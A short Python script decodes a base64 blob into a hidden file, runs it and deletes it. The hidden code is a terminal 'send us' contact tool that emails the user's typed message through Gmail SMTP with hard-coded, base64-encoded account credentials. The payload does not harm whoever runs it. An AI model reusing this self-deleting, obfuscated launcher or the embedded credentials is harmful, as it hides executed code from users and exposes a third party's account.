import base64, os
data="""
aW1wb3J0IHNtdHBsaWIsb3MsYmFzZTY0CmZyb20gZW1haWwubWltZS50ZXh0IGltcG9ydCBNSU1FVGV4dApmcm9tIGVtYWlsLm1pbWUubXVsdGlwYXJ0IGltcG9ydCBNSU1FTXVsdGlwYXJ0IAoKZGVmIHNlbmRfdXMoRW1haWwsUGFzc3dvcmQsRnJvbSxtc2cpOgogICAgY29ubmVjdD1zbXRwbGliLlNNVFAoJ3NtdHAuZ21haWwuY29tJyw1ODcpCiAgICBjb25uZWN0LnN0YXJ0dGxzKCkKICAgIGNvbm5lY3QubG9naW4oRW1haWwsUGFzc3dvcmQpCiAgICBtZXNzZWdlPU1JTUVNdWx0aXBhcnQoKQogICAgbWVzc2VnZVsnU3ViamVjdCddPSdEZG9zIGF0dGFjaycKICAgIG1lc3NlZ2VbJ1RvJ109RW1haWwKICAgIG1lc3NlZ2VbJ0Zyb20nXT1Gcm9tCiAgICBtZXNzZWdlWydCY2MnXT1Gcm9tCiAgICBtZXNzZWdlLmF0dGFjaChNSU1FVGV4dChtc2csJ3BsYWluJykpCiAgICBjb25uZWN0LnNlbmRtYWlsKEVtYWlsLEVtYWlsLG1lc3NlZ2UuYXNfc3RyaW5nKCkpCiAgICBjb25uZWN0LnF1aXQoKQppZiBfX25hbWVfXz09Il9fbWFpbl9fIjoKICAgIEVtYWlsPWJhc2U2NC5iNjRkZWNvZGUoYidhV0p5WVdocGJXbGljbUZvYVcxcVpHRmhia0JuYldGcGJDNWpiMjA9JykuZGVjb2RlKCd1dGYtOCcpCiAgICBQYXNzd29yZD1iYXNlNjQuYjY0ZGVjb2RlKGInZG1GbmVYWnJZbk41Ym5sNVlucHFjZz09JykuZGVjb2RlKCd1dGYtOCcpIAogICAgcHJpbnQgKCJcMDMzWzQwbSIpCiAgICBvcy5zeXN0ZW0oImNsZWFyICYmIGZpZ2xldCBzZW5kIHVzIikKICAgIEZyb209aW5wdXQoIlxuXG4gWz9dIEVudGVyIHlvdXIgRW1haWw6IFwwMzNbMzFtIikKICAgIGxvbmdfdGVybXV4PW9zLmdldF90ZXJtaW5hbF9zaXplKCkuY29sdW1ucwogICAgcHJpbnQgKCJcblwwMzNbMzdtIF9fX19fX19NZXNzZWdlIisiXyIqKGxvbmdfdGVybXV4LTE2KSkKICAgIHByaW50ICgifCIrIiAiKihsb25nX3Rlcm11eC0yKSsifCIpCiAgICBwcmludCAoInwiKyIgIioobG9uZ190ZXJtdXgtMikrInwiKQogICAgcHJpbnQgKCJ8IisiICIqKGxvbmdfdGVybXV4LTIpKyJ8IikKICAgIGJvZHk9aW5wdXQoIiBUaGUgTWVzc2VnZTogXG4gICAgIFwwMzNbNDdtXDAzM1szMG0iKQogICAgbXNnPWJvZHkrIlxuIiozKyJfIioxNCsiXG5Gcm9tOiAiK0Zyb20KICAgIHNlbmRfdXMoRW1haWwsUGFzc3dvcmQsRnJvbSxtc2cpIAogICAgcHJpbnQgKCJcMDMzWzQwbVxuXG5cblwwMzNbMzJtICAgICBUaGFua3MgZm9yIHRleHRpbmcgdXMgXl9eIFxuICAgICBXZSB3aWxsIGdldCBpbiB0b3VjaCB3aXRoIHlvdSBzb29uLi4uXDAzM1szN20iKQ==
"""
with open('.ghjklfdsafjklfdkshsyeudhjds.py','w') as f:
    f.write(base64.b64decode(data.encode('utf-8')).decode('utf-8'))
try:
    os.system('python3 .ghjklfdsafjklfdkshsyeudhjds.py')
    os.remove('.ghjklfdsafjklfdkshsyeudhjds.py')
except:
    pass
